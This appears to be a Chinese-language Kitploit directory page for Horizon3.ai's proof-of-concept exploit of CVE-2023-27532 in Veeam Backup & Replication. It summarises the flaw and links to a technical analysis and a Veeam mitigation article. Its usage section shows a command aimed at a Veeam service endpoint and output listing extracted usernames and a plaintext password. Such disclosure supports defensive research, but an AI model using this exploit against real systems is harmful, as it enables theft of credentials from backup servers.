Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27532 — 针对Veeam Backup & Replication中CVE-2023-27532的概念验证漏洞利用,通过滥用未受保护的API端点从目标系统提取凭据。 | Kitploit
工具/GitHubGitHub/horizon3ai/cve-2023-27532
漏洞分析漏洞利用API安全测试渗透测试红队
GitHubhorizon3ai/cve-2023-27532

CVE-2023-27532

针对Veeam Backup & Replication中CVE-2023-27532的概念验证漏洞利用,通过滥用未受保护的API端点从目标系统提取凭据。

查看仓库
741133年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-27532

针对影响 Veeam Backup and Replication 的 CVE-2023-27532 的 PoC

Technical Analysis

关于漏洞的技术根因分析可以在我们的博客中找到: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive

Summary

此 PoC 利用不安全的 API 端点来提取凭据。

Usage

root@kitploit:~
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password 
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  

Mitigations

更新到最新版本或按照 Veeam 建议中的说明进行缓解

  • https://www.veeam.com/kb4424

Follow the Horizon3.ai Attack Team on Twitter for the latest security research:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Disclaimer

本软件纯粹为学术研究和开发有效的防御技术而创建,除非明确授权,否则不应用于攻击系统。项目维护者对软件的滥用不承担任何责任。请负责任地使用。

下载工具